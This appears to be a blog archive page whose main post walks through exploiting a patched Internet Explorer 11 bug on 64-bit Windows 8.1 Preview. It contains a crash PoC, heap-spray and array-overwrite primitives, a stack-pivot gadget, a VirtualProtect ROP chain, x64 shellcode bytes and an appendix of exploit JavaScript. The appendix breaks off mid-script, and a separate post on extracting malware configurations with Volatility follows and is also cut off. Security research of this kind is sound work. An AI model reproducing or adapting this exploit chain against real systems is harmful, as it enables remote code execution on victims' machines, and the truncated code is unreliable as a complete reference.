Wednesday, November 6, 2013

Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview

Note: The vulnerability described here was patched by Microsoft in the October 2013 security update.
Earlier this year, Microsoft announced several security bounty programs, one of which was a bounty program for bugs in Internet Explorer 11. I participated in this program and relatively quickly found a memory corruption bug. Although I believed the bug could be exploited for remote code execution, due to lack of time (I had just become a father right before the bounty programs started, so I had other preoccupations) I hadn't actually developed a working exploit at the time. However, I was interested in the difficulty of writing an exploit for the new OS and browser version, so I decided to try to develop one later. In this post, I'll first describe the bug and then the development of a working exploit for it on 64-bit Windows 8.1 Preview.
When setting out to develop the exploit I didn't strive for 100% reliability (the specifics of the bug would have made that difficult, and my goal was to experiment with the new platform, not to build the next cyber weapon); however, I did set some limitations for myself that would make the exercise more challenging:
1. The exploit should not rely on any plugins (so no Flash and no Java). I wanted it to work on the default installation.
2. The exploit must work on 64-bit IE and 64-bit Windows. Targeting 32-bit would be cheating, as many exploit mitigation techniques (such as heap base randomization) aren't really effective on a 32-bit OS or in 32-bit processes. Additionally, there aren't many 64-bit Windows exploits out there.
3. No additional vulnerabilities should be used (e.g. for ASLR bypass).
One prior note about exploiting 64-bit Internet Explorer: In Windows 8 and 8.1, when running IE on the desktop (“old interface”) the renderer processes of IE will be 32-bit even if the main process is 64-bit. If the new (“touch screen”) interface is used everything is 64-bit. This is an interesting choice and makes the desktop version of IE less secure. So in the default environment, the exploit shown here actually targets the touch screen interface version of IE.
To force IE into using 64-bit mode on the desktop for exploit development, I forced IE to use single-process mode (the TabProcGrowth registry key). However, note that this was used for debugging only; if used for browsing random pages, it will make IE even less secure because it disables IE's sandbox.

The bug

A minimal sample that triggers the bug is shown below.

<script>
function bug() {
 t = document.getElementsByTagName("table")[0];
 t.parentNode.runtimeStyle.posWidth = "";
 t.focus();
}
</script>
<body onload=bug()>
<table><th><ins>aaaaaaaaaa aaaaaaaaaa

And here is the debugger output.

(4a8.440): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSHTML!Layout::ContainerBox::ContainerBox+0x1e6:
00007ff8`e0c90306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000000a6`e1466168=????????????????
0:010> r
rax=000000a6d1466170 rbx=000000a6d681c360 rcx=000000000000007f
rdx=0000000001ffffff rsi=000000a6d5960330 rdi=00000000ffffffff
rip=00007ff8e0c90306 rsp=000000a6d61794b0 rbp=000000a6d5943a90
r8=0000000000000001  r9=0000000000000008 r10=00000000c0000034
r11=000000a6d61794a0 r12=00000000ffffffff r13=00000000ffffffff
r14=000000000000000b r15=00000000ffffffff
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSHTML!Layout::ContainerBox::ContainerBox+0x1e6:
00007ff8`e0c90306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000000a6`e1466168=????????????????
0:010> k
Child-SP          RetAddr           Call Site
000000a6`d61794b0 00007ff8`e0e49cc0 MSHTML!Layout::ContainerBox::ContainerBox+0x1e6
000000a6`d6179530 00007ff8`e0e554a8 MSHTML!Layout::TableGridBox::TableGridBox+0x38
000000a6`d6179590 00007ff8`e0e553c2 MSHTML!Layout::TableGridBoxBuilder::CreateTableGridBoxBuilder+0xd8
000000a6`d6179600 00007ff8`e0c8b720 MSHTML!Layout::LayoutBuilder::CreateLayoutBoxBuilder+0x2c9
000000a6`d61796c0 00007ff8`e0c8a583 MSHTML!Layout::LayoutBuilderDriver::StartLayout+0x85f
000000a6`d61798d0 00007ff8`e0c85bb2 MSHTML!Layout::PageCollection::FormatPage+0x287
000000a6`d6179a60 00007ff8`e0c856ae MSHTML!Layout::PageCollection::LayoutPagesCore+0x2aa
000000a6`d6179c00 00007ff8`e0c86389 MSHTML!Layout::PageCollection::LayoutPages+0x18e
000000a6`d6179c90 00007ff8`e0c8610f MSHTML!CMarkupPageLayout::CalcPageLayoutSize+0x251
000000a6`d6179db0 00007ff8`e0df85ca MSHTML!CMarkupPageLayout::CalcTopLayoutSize+0xd7
000000a6`d6179e70 00007ff8`e12d472d MSHTML!CMarkupPageLayout::DoLayout+0x76
000000a6`d6179eb0 00007ff8`e0d9de95 MSHTML!CView::EnsureView+0xcde
000000a6`d617a270 00007ff8`e0d1c29e MSHTML!CElement::EnsureRecalcNotify+0x135
000000a6`d617a310 00007ff8`e1556150 MSHTML!CElement::EnsureRecalcNotify+0x1e
000000a6`d617a350 00007ff8`e1555f6b MSHTML!CElement::focusHelperInternal+0x154
000000a6`d617a3b0 00007ff8`e19195ee MSHTML!CElement::focus+0x87
000000a6`d617a400 00007ff8`e06ed862 MSHTML!CFastDOM::CHTMLElement::Trampoline_focus+0x52
000000a6`d617a460 00007ff8`e06f0039 jscript9!amd64_CallFunction+0x82
000000a6`d617a4b0 00007ff8`e06ed862 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x154
000000a6`d617a550 00007ff8`e06f26ff jscript9!amd64_CallFunction+0x82

As can be seen above, IE crashes in the MSHTML!Layout::ContainerBox::ContainerBox function while attempting to read uninitialized memory pointed to by rax + rdx*8. rax actually points to valid memory that contains a CFormatCache object (which looks correct given the PoC), while the value of rdx (0x0000000001ffffff) is interesting. So I looked at the code of the ContainerBox::ContainerBox function to see where this value comes from and also what could be done if an attacker controlled the memory at rax + 0xFFFFFF8.

00007ffb`dac00145 83cdff          or      ebp,0FFFFFFFFh
...
00007ffb`dac0023e 440fb64713      movzx   r8d,byte ptr [rdi+13h]
00007ffb`dac00243 410fb6c0        movzx   eax,r8b
00007ffb`dac00247 c0e805          shr     al,5
00007ffb`dac0024a 2401            and     al,1
00007ffb`dac0024c 0f84048f6200    je      MSHTML!Layout::ContainerBox::ContainerBox+0x562 (00007ffb`db229156)
00007ffb`dac00252 440fb76f68      movzx   r13d,word ptr [rdi+68h]
...
00007ffb`db229156 448bed          mov     r13d,ebp
00007ffb`db229159 e9f9709dff      jmp     MSHTML!Layout::ContainerBox::ContainerBox+0x137 (00007ffb`dac00257)
...
00007ffb`dac002db 410fbffd        movsx   edi,r13w
...
00007ffb`dac002fb 8bcf            mov     ecx,edi
00007ffb`dac002fd 8bd7            mov     edx,edi
00007ffb`dac002ff 48c1ea07        shr     rdx,7
00007ffb`dac00303 83e17f          and     ecx,7Fh
00007ffb`dac00306 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:0000007a`390257f8=????????????????
00007ffb`dac0030a 488d0c49        lea     rcx,[rcx+rcx*2]
00007ffb`dac0030e 488d14c8        lea     rdx,[rax+rcx*8]
00007ffb`dac00312 8b4cc810        mov     ecx,dword ptr [rax+rcx*8+10h]
00007ffb`dac00316 8b420c          mov     eax,dword ptr [rdx+0Ch]
00007ffb`dac00319 3bc8            cmp     ecx,eax
00007ffb`dac0031b 0f83150d7500    jae     MSHTML!Layout::ContainerBox::ContainerBox+0x750f16 (00007ffb`db351036)
00007ffb`dac00321 ffc0            inc     eax
00007ffb`dac00323 89420c          mov     dword ptr [rdx+0Ch],eax

The value of rdx at the time of the crash comes, after several assignments, from the value of ebp, which is initialized to 0xFFFFFFFF near the beginning of the function (note that ebp/rbp is not used as the frame pointer here). My assumption is that 0xFFFFFFFF (-1) is the initial value of a variable used as an index into the CFormatCache. Later in the code, a pointer to a CTreeNode is obtained, a flag in the CTreeNode is examined and, if it is set, the index value is copied from the CTreeNode object. However, if the flag is not set (as is the case in the PoC), the initial value is used. The value 0xFFFFFFFF is then split into two parts, upper and lower (it looks like CFormatCache is implemented as a 2D array). The higher index (which will be equal to 0x1ffffff) is multiplied by 8 (the size of a void*), this offset is added to rax, and the content at that memory location is read back into rax. Then the lower index (which will be 0x7f) is multiplied by 24 (presumably the size of a CCharFormat element), this offset is added to rax, and the resulting address is stored in rdx. Finally, and this is the part relevant for exploitation, the number at [rdx+0Ch] is read, increased, and then written back to [rdx+0Ch].

Written in C++ and simplified a bit, the relevant code would look like this:

int cacheIndex = -1;
if(treeNode->flag) {
  cacheIndex = treeNode->cacheIndex;
} 
unsigned int index_hi = cacheIndex, index_lo = cacheIndex;
index_hi = index_hi >> 7;
index_lo = index_lo & 0x7f;
//with sizeof(formatCache[i]) == 8 and sizeof(formatCache[i][j]) == 24
formatCache[index_hi][index_lo].some_number++; 

For practical exploitation purposes, what happens is this: a pointer to valid memory (the CFormatCache pointer) is increased by 0x0FFFFFF8 (256M) and the value at this address is treated as another pointer. Let's call the address (CFormatCache address + 0x0FFFFFF8) P1 and the address it points to P2. The DWORD value at (P2 + 0xBF4) will be increased by 1 (note: 0xBF4 is computed as 0x7F * 3 * 8 + 0x0C).
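To double-check those constants, here is the index arithmetic reproduced in a few lines of Python (purely illustrative; the values come straight from the disassembly above):

def offsets_from_index(cache_index):
    # The uninitialized index is -1, i.e. 0xFFFFFFFF as an unsigned 32-bit value
    index_hi = (cache_index & 0xFFFFFFFF) >> 7
    index_lo = cache_index & 0x7F
    p1_offset = index_hi * 8               # added to the CFormatCache pointer to form P1
    inc_offset = index_lo * 3 * 8 + 0x0C   # added to P2 to locate the DWORD that gets incremented
    return p1_offset, inc_offset

print([hex(x) for x in offsets_from_index(-1)])   # ['0xffffff8', '0xbf4']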

The exploit

If we were writing an exploit for a 32-bit process, a straightforward (though not very clean) way to exploit the bug using heap spraying would be to spray with a 32-bit number such that, when 0xBF4 is added to it, the address of something interesting (e.g. a string or array length) is obtained. The “address of something interesting” could be predicted by having another heap spray consisting of “interesting objects”.

Since the exploit is being written for a 64-bit process with full ASLR, we won't know or be able to guess the address of an “interesting” object. We certainly won't be able to fill the address space of a 64-bit process, and the heap base will be randomized, thus making the addresses of objects on the heap unpredictable.
Heap spraying lives

However, even in this case, heap spraying is still useful for the first part of the exploit. Note that when triggering the bug, P1 is calculated as a valid heap address increased by 0x0FFFFFF8 (256M). And if we heap spray, we are allocating memory relative to the heap base. Thus, by spraying approximately 256M of memory, we can set P2 to an arbitrary value.
So to conclude, despite the significantly larger address space of 64-bit processes and heap base randomization, heap spraying is still useful in cases where we can make a vulnerable application dereference memory at a valid heap address plus a large offset. As this is typical behavior for bounds-checking vulnerabilities, it's not altogether uncommon. Besides the bug being discussed here, the previous IE bug I wrote about exploiting here also exhibits this behavior.
Although heap spraying is often avoided in modern exploits in favor of more reliable alternatives, given the large (fixed) offset of 256M, it is pretty much required in this case. And although the offset is fixed, it's a pretty good value as far as heap spraying goes: not so large as to cause memory exhaustion and not so small as to cause major reliability issues (other than those inherent to heap spraying in the first place).
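For a rough sense of scale, here is the arithmetic behind the spray (illustrative only; the actual exploit splits the spray across several JavaScript arrays):

SPRAY_OFFSET = 0x0FFFFFF8              # fixed offset used by the bug (just under 256 MB)
ELEMENT_SIZE = 8                       # each sprayed array element is a 64-bit value

print(SPRAY_OFFSET // ELEMENT_SIZE)    # ~33.5 million elements needed to cover the offset
print(SPRAY_OFFSET / (1024.0 * 1024))  # ~256 MB of sprayed data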

Look Ma, no Flash

But the problem of not being able to guess the address of an interesting object still remains, and thus the question is: what do we heap spray with? Well, rather than heap spraying with exact values, we can spray with pointers. Since an offset of 0xBF4 is added to P2 before increasing the value it points to, we'll spray with the address of some object and try to make this address + 0xBF4 point to something of interest.
So what should “something of interest” be? The first thing I tried was the length of a JavaScript string, as in here. And although I was able to align the stars to overwrite the higher dword of a qword containing a string length, a problem arose: the JavaScript string length is treated as a 32-bit number. Note that most pointers (including those we can easily use in our heap spray) on 64-bit will be qword-aligned, and when adding an offset of 0xBF4 to such a pointer we will end up with a pointer to the higher dword of qword-aligned memory. So an interesting value needs to either be 64-bit or not qword-aligned.
Another idea was to try to overwrite an address. However, note that triggering the bug would increase the address by 4GB as (assuming a qword-aligned address) we are increasing the higher dword. To control the content at this address we would need another heap spray of ~4G data and this would cause memory issues on computers with less free RAM than that. Incidentally, the computer I ran Windows 8.1 Preview VM on had only 4GB of RAM and the Windows 8.1 VM had just 2GB of RAM so I decided to drop this idea and look at alternatives.
In several recent exploits used in the wild, the length of a Flash array was overwritten to leverage a vulnerability. While Flash was off limits in this exercise, let's take a look at JavaScript arrays in IE 11 instead. As it turns out, there is an interesting value that is correctly aligned. An example JavaScript Array object with an explanation of some of its fields is shown below. Note that the actual array content may be split across several buffers.



offset:0, size:8 vtable ptr
offset:0x20, size:4 array length
offset:0x28, size:8 pointer to the buffer containing array data
[beginning of the first buffer, stored together with the array]
offset:0x50, size:4 index of the first element in this buffer
offset:0x54, size:4 number of elements currently in the buffer
offset:0x58, size:4 buffer capacity
offset:0x60, size:8 ptr to the next buffer
offset:0x68, size:varies array data stored in the buffer

Although it's not necessary for understanding the exploit, here's also an example String object with an explanation of some of its fields.



offset:0, size:8 vtable ptr
offset:0x10, size:4 string length
offset:0x18, size:8 data ptr

As can be seen from above, the “number of elements currently in the buffer” of a JavaScript array is not qword-aligned and is a value that might be interesting to overwrite.
This is indeed the value I ended up going for. To accomplish this, I got the memory aligned as seen in the image below.



We'll heap spray with pointers to a JavaScript String object by creating large JavaScript arrays where each element of the array is the same String object. We'll also get memory aligned in such a way that, at an offset of 0xBF4 from the start of the string, there will be a part of a JavaScript array that holds the value we want to overwrite.
You might wonder why I heap sprayed with pointers to a String and not an Array object. The reason is that the String object is much smaller (32 bytes vs. 128 bytes), so by having multiple strings close to one another and pointing to a specific one, we can better “aim” for a specific offset inside an Array object. Of course, if we have several strings close to one another, the question becomes which one to use in the heap spray. Since an Array object is 4 times the size of a String, there are four different offsets in the Array we can overwrite. By choosing randomly, in one case (with probability 1/4) we will overwrite exactly what we want. In one case, we will overwrite an address that will cause a crash on a subsequent access of the array. And in the remaining two cases, we will overwrite values that are not important, and we would be able to try again by spraying with a pointer to a different string. Thus a blind guess gives a success probability of 1/4, while a try/retry approach gives a success probability of 3/4 (if you know your statistics, you might think that this number is wrong, but we can actually avoid crashes after an incorrect but non-fatal attempt by trying different strings in descending order). An even better approach would be to disclose the string offsets by first aligning memory so as to put something readable at an offset of 0xBF4 from the String object used in the heap spray. While I have observed that this is possible, it isn't implemented in the provided exploit code and is left as an exercise for the reader. Refer to the next section for information that could help you achieve such alignment.
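The "four different offsets" argument is easy to verify numerically. Assuming the 0x1000-aligned, type-segregated bins described in the next section, a quick Python sketch (the bin address below is hypothetical; only the object sizes and the 0xBF4 constant matter):

STRING_SIZE = 32      # size of a jscript9 String object
ARRAY_SIZE  = 128     # size of a jscript9 Array object
BUG_OFFSET  = 0xBF4   # offset added by the vulnerability

string_bin = 0x1000   # hypothetical 0x1000-aligned bin holding the sprayed String objects

hit_offsets = set()
for i in range(16):   # walk over 16 consecutive String objects in the bin
    target = string_bin + i * STRING_SIZE + BUG_OFFSET
    hit_offsets.add(target % ARRAY_SIZE)   # offset of the incremented DWORD inside an Array object

print(sorted(hex(o) for o in hit_offsets))  # ['0x14', '0x34', '0x54', '0x74'] -- only four possibilities;
                                            # 0x54 is the "number of elements" field from the layout above
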
In the exploit code provided, a naive (semi)blind-guess approach is used where there is a large array of Strings (strarr) and a string at a constant index is used for the heap spray. I have observed that this works reliably for me when opening the PoC in a new process/tab (so I didn’t have any other JavaScript objects in the current process). If you want to play with the exploit and the index I used doesn’t work for you, you’ll likely need to pick a different one or implement one of the approaches described above.

Feng Shui in JavaScript heap

Before moving on with the exploit, let's first take some time to examine how it's possible to heap spray in IE11 and get the desired object alignment on the heap with high reliability.
Firstly, heap spraying: while Microsoft has made it rather difficult to heap spray with JavaScript strings, JavaScript arrays in IE11 appear not to prevent this in any way. It's possible to spray both with pointers (as seen above) and with absolute values, e.g. by creating a large array of integers. While many recent IE exploits use Flash for heap spraying, it isn't necessary and, given the current Array implementation and its improved speed over its predecessors, JavaScript arrays might just be the object of choice for heap spraying in IE in the future.
Secondly, alignment of objects on heap: While the default Heap implementation in Windows 8 and above (the low fragmentation heap) includes several mitigations that make getting the desired alignment difficult, such as guard pages and allocation order randomization, in IE11 basic JavaScript objects (such as Arrays and Strings) use a custom heap implementation that has none of these features.
I'll briefly describe what I observed about this JavaScript heap implementation. Note that all of the below is based on observing the behavior rather than reverse engineering the code, so I might have drawn some wrong conclusions, but it works as described for the purposes of the given exploit.
The space for JavaScript objects is allocated in blocks of 0x20000 bytes. If more space is needed, additional blocks will be allocated, and there is nothing preventing these blocks from being right next to one another (so a theoretical overflow in one block could write into another).
These blocks are further divided into bins of 0x1000 bytes (at least for small objects). One bin will only hold objects of the same size and possibly type. So, for example, in this exploit where we have String and Array objects of 32 and 128 bytes respectively, some bins will hold only String objects (128 of them at most), while some will hold only Array objects (32 of them at most). When a bin is fully used, it contains only the “useful” content and no metadata. I have also observed that the objects are stored in separate 0x20000-byte blocks from the user-provided content, so string and array data will be stored in different blocks than the corresponding String and Array objects, except when the data is small enough to be stored together with the object (e.g. single-character strings, or small arrays like the 5-element ones in the exploit).
The allocation order of objects inside a given bin is sequential. That means that if we, for example, create three String objects in close succession and assuming no holes in any of the bins, they will be next to each other, with the first one having the lowest address, followed by the second and then the third.

And now, for my next trick

So at this point we can increment the number of elements in the JavaScript array. In fact, we’ll trigger the vulnerability multiple times (5 times in the provided exploit, where each trigger will increase this number by 3) in order to increase it a bit more. Unfortunately, increasing the number of elements does not allow us to write data past the end of the buffer, but it does allow us to read data past the end. This is sufficient at this point because it allows us to break ASLR and learn the precise address of the Array object we overwrote.
Knowing the address of the Array object, we can repeat the heap spray, but this time we'll spray with exact values (I used an Array of integers for this). The value we are going to spray with is the address of an array's buffer capacity field decreased by 0xBF1. This means that the spray value + 0xBF4 will be the address of the highest byte of the buffer capacity value, so each increment effectively adds 0x1000000 to the capacity. After the buffer capacity has been overwritten, we'll be able to both read and write data past the end of the JS Array's buffer.
From here, we can quite easily get the two important elements that constitute a modern browser exploit: The ability to read arbitrary memory and to gain control over RIP.
We can read arbitrary memory by scanning the memory after the Array for a String object and then overwriting the data pointer and (if we want to read larger data) size of the string.
We can get control over RIP by overwriting the vtable pointer of a nearby Array object and triggering a virtual method call. While IE10 introduced Virtual Table Guard (vtguard) for some classes in mshtml.dll, jscript9.dll has no such protection. However, note that, with arbitrary memory disclosure, even if vtguard were present it would be just a minor annoyance.

64-bit exploits for 32-bit exploit writers

With control over RIP and memory disclosure, we'll want to construct a ROP chain in order to defeat DEP. As we don't control the stack, the first thing we need is a stack pivot gadget. So, with arbitrary memory disclosure it should be easy to search for xchg rax,rsp; ret; in some executable module, right? Well, no. As it turns out, stack pivot gadgets are much less common in x64 code than in x86 code. On x86, xchg eax,esp; ret; is just 2 bytes in size, so there will be many unintended sequences like that. On x64, xchg rax,rsp requires a REX prefix, making the sequence 3 bytes, which makes unintended occurrences much less common. Having not found it (or any other “clean” stack pivot gadget) in mshtml.dll and jscript9.dll, I had to look for alternatives. After a look at mshtml.dll I found the stack pivot sequence shown below, which isn't very clean but does the trick, assuming both rax and rcx point to readable memory (which is the case here).

00007ffb`265ea973 50              push    rax
00007ffb`265ea974 5c              pop     rsp
00007ffb`265ea975 85d2            test    edx,edx
00007ffb`265ea977 7408            je      MSHTML!CTableLayout::GetLastRow+0x25 (00007ffb`265ea981)
00007ffb`265ea979 8b4058          mov     eax,dword ptr [rax+58h]
00007ffb`265ea97c ffc8            dec     eax
00007ffb`265ea97e 03c2            add     eax,edx
00007ffb`265ea980 c3              ret
00007ffb`265ea981 8b8184010000    mov     eax,dword ptr [rcx+184h]
00007ffb`265ea987 ffc8            dec     eax
00007ffb`265ea989 c3              ret

Note that, while there is a conditional jump in the sequence, both branches end with RET and won't cause a crash, so they both work well for our purpose. While the exploit mostly relies on jscript9 objects, the address of the (larger) mshtml.dll module can easily be obtained using the memory disclosure by pushing an mshtml object into a JS array we can read and then following references from the array to the mshtml object and its vtable.
After control of the stack is gained, we can call VirtualProtect to make a part of the heap we can write to executable. We can find the address of VirtualProtect in the IAT of mshtml.dll (the exploit includes some very basic PE32+ parsing). So, with the address of VirtualProtect and control over the stack, we can now just put the correct arguments on the stack and return into VirtualProtect, right? Well, no. 64-bit Windows uses a different calling convention than 32-bit Windows: a fastcall convention where the first 4 arguments (which is exactly the number of arguments VirtualProtect has) are passed through the registers RCX, RDX, R8 and R9 (in that order). So we need some additional gadgets to load the correct arguments into the correct registers:

pop rcx; ret;
pop rdx; ret;
pop r8; ret;
pop r9; ret;

As it turns out, the first three are really common in mshtml.dll. The fourth one isn't; however, for VirtualProtect the last argument just needs to point to writable memory, which is already the case at the time we get control over RIP, so we don't actually have to change r9.
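As an aside on the VirtualProtect lookup mentioned earlier: the exploit does its PE32+ parsing in JavaScript over the memory-disclosure primitive, but the same IAT walk can be illustrated off-line with the pefile Python module (a sketch; the path is illustrative and the exact import entry may differ between Windows builds, e.g. it may go through an api-ms-win-core forwarder DLL):

import pefile

# Parse mshtml.dll from disk and locate the IAT slot for VirtualProtect.
# At runtime, the exploit reads the resolved pointer out of the equivalent
# slot in the loaded module using the arbitrary-read primitive.
pe = pefile.PE(r'C:\Windows\System32\mshtml.dll')
for entry in pe.DIRECTORY_ENTRY_IMPORT:
    for imp in entry.imports:
        if imp.name == b'VirtualProtect':
            print(entry.dll, hex(imp.address))   # imp.address = VA of the IAT entry
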
The final ROP chain looks like this:

address of pop rcx; ret;
address on the heap block with shellcode
address of pop rdx; ret;
0x1000 (size of the memory that we want to make executable)
address of pop r8; ret;
0x40 (PAGE_EXECUTE_READWRITE)
address of VirtualProtect
address of shellcode
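In memory this is just a sequence of little-endian qwords. A sketch of how the chain could be packed (all addresses below are placeholders; the real values are resolved at runtime through the memory disclosure):

import struct

def q(value):
    return struct.pack('<Q', value)   # one little-endian qword

# Placeholder addresses -- in the exploit these come from the disclosed mshtml.dll base.
pop_rcx_ret    = 0x4141414141414141
pop_rdx_ret    = 0x4242424242424242
pop_r8_ret     = 0x4343434343434343
virtualprotect = 0x4444444444444444   # read from mshtml.dll's IAT
shellcode_addr = 0x4545454545454545   # heap address containing the shellcode

rop  = q(pop_rcx_ret) + q(shellcode_addr)   # rcx = lpAddress
rop += q(pop_rdx_ret) + q(0x1000)           # rdx = dwSize
rop += q(pop_r8_ret)  + q(0x40)             # r8  = PAGE_EXECUTE_READWRITE
                                            # r9 (lpflOldProtect) already points to writable memory
rop += q(virtualprotect)                    # return into VirtualProtect...
rop += q(shellcode_addr)                    # ...which returns into the now-executable shellcode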

So, we can now finally execute some x64 shellcode, like SkyLined's x64 calc shellcode that works on 64-bit Windows 7 and 8, right? Well, no. Shellcode authors usually (and understandably) prefer small shellcode size over generality and save space by relying on specifics of the OS that need not hold in future versions. For example, for compatibility reasons, Windows 7 and 8 store the PEB and module information structures, as well as the ntdll and kernel32 modules, at addresses lower than 2G. This is no longer true in Windows 8.1 Preview. Also, while the Windows x64 fastcall calling convention requires leaving 32 bytes of shadow space on the stack for the use of the called function, SkyLined's win64-exec-calc-shellcode leaves just 8 bytes before calling WinExec. While this appears to work on Windows 7 and 8, on Windows 8.1 Preview it causes the command string (“calc” in this case) stored on the stack to be overwritten, as it ends up inside WinExec's shadow space. To resolve these compatibility issues I made modifications to the shellcode, which I provide in the exploit. It should now work on Windows 8.1.
That's it: we can finally execute the shellcode and have thus proven arbitrary code execution. As IE is fully 64-bit only in the touch screen mode, I don't have a cool screenshot of Windows Calculator popped over it (calc is shown on the desktop instead). But I do have a screenshot of the desktop with IE forced into a single 64-bit process.



The full exploit code can be found at the end of this blog post.

Conclusion

Although Windows 8/8.1 packs an impressive arsenal of memory corruption mitigations, memory corruption exploitation is still alive and kicking. Granted, some vulnerability classes might be more difficult to exploit, but the vulnerability presented here was the first one I found in IE11 and there are likely many more vulnerabilities that can be exploited in a similar way. The exploit also demonstrates that, under some conditions, heap spraying is still useful even in 64-bit processes. In general, while there have been a few cases where it was more difficult to write parts of the exploit on x64 than it would be on x86 (such as finding what to spray with and overwrite, finding stack pivot sequences etc.), the difficulties wouldn't be sufficient to stop a determined attacker.
Finally, based on what I've seen, here are a few ideas to make writing exploits for IE11 on Windows 8.1 more difficult:
  • Consider implementing protection against heap spraying with JavaScript arrays. This could be implemented by RLE-encoding large arrays that consist of a single repeated value or several repeated values.
  • Consider implementing the same level of protection for the JavaScript heap as for the default heap implementation - add guard pages and introduce randomness.
  • Consider implementing Virtual Table Guard for common JavaScript objects.
  • Consider making compiler changes to remove all stack pivot sequences from the generated code of common modules. These are already scarce in x64 code so there shouldn't be a large performance impact.


Appendix: Exploit Code

<script>
 
 var magic = 25001; //if the exploit doesn't work for you, try selecting another number in the range 25000 +/- 128
 var strarr = new Array();
 var arrarr = new Array();
 var sprayarr = new Array();
 var numsploits;
 var addrhi,addrlo;
 var arrindex = -1;
 var strindex = -1;
 var strobjidx = -1;
 var mshtmllo,mshtmlhi;

 //calc shellcode, based on SkyLined's x64 calc shellcode, but fixed to work on win 8.1
 var shellcode = [0x40, 0x80, 0xe4, 0xf8, 0x6a, 0x60, 0x59, 0x65, 0x48, 0x8b, 0x31, 0x48, 0x8b, 0x76, 0x18, 0x48, 0x8b, 0x76, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30, 0x48, 0x8b, 0x7e, 0x30, 0x03, 0x4f, 0x3c, 0x8b, 0x5c, 0x0f, 0x28, 0x8b, 0x74, 0x1f, 0x20, 0x48, 0x01, 0xfe, 0x8b, 0x4c, 0x1f, 0x24, 0x48, 0x01, 0xf9, 0x31, 0xd2, 0x0f, 0xb7, 0x2c, 0x51, 0xff, 0xc2, 0xad, 0x81, 0x3c, 0x07, 0x57, 0x69, 0x6e, 0x45, 0x75, 0xf0, 0x8b, 0x74, 0x1f, 0x1c, 0x48, 0x01, 0xfe, 0x8b, 0x34, 0xae, 0x48, 0x01, 0xf7, 0x68, 0x63, 0x61, 0x6c, 0x63, 0x54, 0x59, 0x31, 0xd2, 0x48, 0x83, 0xec, 0x28, 0xff, 0xd7, 0xcc, 0, 0, 0, 0];

//triggers the bug
function crash(i) {
 numsploits = numsploits + 1;
 t = document.getElementsByTagName("table")[i];
 t.parentNode.runtimeStyle.posWidth = -1;
 t.focus();
 setTimeout(cont, 100);  
}

//heap spray

Tuesday, October 29, 2013

Dumping Malware Configuration Data from Memory with Volatility

When I first started delving into memory forensics, years ago, we relied upon controlled operating system crashes (to create memory crash dumps) or the old FireWire exploit with a special laptop. Later, software-based tools like regular dd and win32dd made the job much easier (and more entertaining, as we watched the feuds between mdd and win32dd).

In the early days, our analysis was basically performed with a hex editor. By collecting volatile data from an infected system, we'd attempt to map memory locations manually to known processes, an extremely frustrating and error-prone procedure. Even with the advent of graphical tools such as HBGary Responder Pro, which comes with a hefty price tag, I've found most of my time spent viewing raw memory dumps in WinHex.

The industry has slowly changed as tools like Volatility have gained maturity and become more feature-rich. Volatility is a free and open-source memory analysis tool that takes the hard work out of mapping and correlating raw data to actual processes. At first I shunned Volatility for its sheer amount of command-line memorization, where each query requires a specialized command line. Over the years, I've come to appreciate this aspect and the flexibility it provides to an examiner.

It's Volatility that this blog post focuses on: using it to dump malware configurations from memory.

For those unfamiliar with the concept, it's rare to find static malware, that is, malware that has a plain-text URL in its .rdata section mixed in with other strings. Modern malware tends to be more dynamic, allowing configurations to be downloaded upon infection or strategically injected into the executable by its author. Crimeware families (Carberp, Zeus) tend to favor the former, connecting to a hardcoded IP address or domain to download a detailed configuration profile (often in XML) that is used to determine how the malware is to operate. What domains does it beacon to, on which ports, and with what campaign IDs - these are the items we determine from malware configurations.

Other malware rely upon a known block of configuration data within the executable, sometimes found within .rdata or simply in the overlay (the data after the end of the actual executable). Sometimes this data is in plain text, often it's encoded or encrypted. A notable example of this is in Mandiant's APT1 report on TARSIP-MOON, where a block of encrypted data is stored in the overlay. The point of this implementation is that an author can compile their malware, and then add in the appropriate configuration data after the fact.

As a method of improving the timeliness of malware analysis, I've been advocating for greater research into, and implementation of, configuration dumpers. By identifying where data is stored within the file, and by knowing its encryption routine, one can simply write a script to extract the data, decrypt it, and print it out. Without even running the malware, we know its intended C2 communications and have immediate signatures that we can then implement into our network defenses.

While this data may appear as a simple plaintext structure in one sample, it's often encoded or encrypted via a myriad of techniques. Sometimes it's a form of encryption that we, or our team, deemed too difficult to decrypt in a reasonable time. This is pretty common; advanced encryption or compression can take weeks to completely unravel and is often left for when there's downtime in operations.

What do we do, then? Easy, go for the memory.

We know that the malware has a decryption routine that takes in this data and produces decrypted output. By simply running the malware and analyzing its memory footprint, we will often find the decrypted results in plaintext, as the configuration has already been decrypted and is in use by the malware.

Why break the encryption when we can let the malware just decrypt it for us?



For example, the awesome people at Malware.lu released a static configuration dumper for a known Java-based RAT. This dumper, available here on their GitHub repo, extracts the encryption key and configuration data from the malware's Java ZIP and decrypts it. It used Triple DES (TDEA), but once that routine became public knowledge, the author quickly switched to a new routine, and has since continued switching encryption routines regularly to avoid easy decryption. Based on earlier analysis, we know that the data is decrypted as:

Offset      0  1  2  3  4  5  6  7   8  9 10 11 12 13 14 15

00000000   70 6F 72 74 3D 33 31 33  33 37 53 50 4C 49 54 01   port=31337SPLIT.
00000016   6F 73 3D 77 69 6E 20 6D  61 63 53 50 4C 49 54 01   os=win macSPLIT.
00000032   6D 70 6F 72 74 3D 2D 31  53 50 4C 49 54 03 03 03   mport=-1SPLIT...
00000048   70 65 72 6D 73 3D 2D 31  53 50 4C 49 54 03 03 03   perms=-1SPLIT...
00000064   65 72 72 6F 72 3D 74 72  75 65 53 50 4C 49 54 01   error=trueSPLIT.
00000080   72 65 63 6F 6E 73 65 63  3D 31 30 53 50 4C 49 54   reconsec=10SPLIT
00000096   10 10 10 10 10 10 10 10  10 10 10 10 10 10 10 10   ................
00000112   74 69 3D 66 61 6C 73 65  53 50 4C 49 54 03 03 03   ti=falseSPLIT...
00000128   69 70 3D 77 77 77 2E 6D  61 6C 77 61 72 65 2E 63   ip=www.malware.c
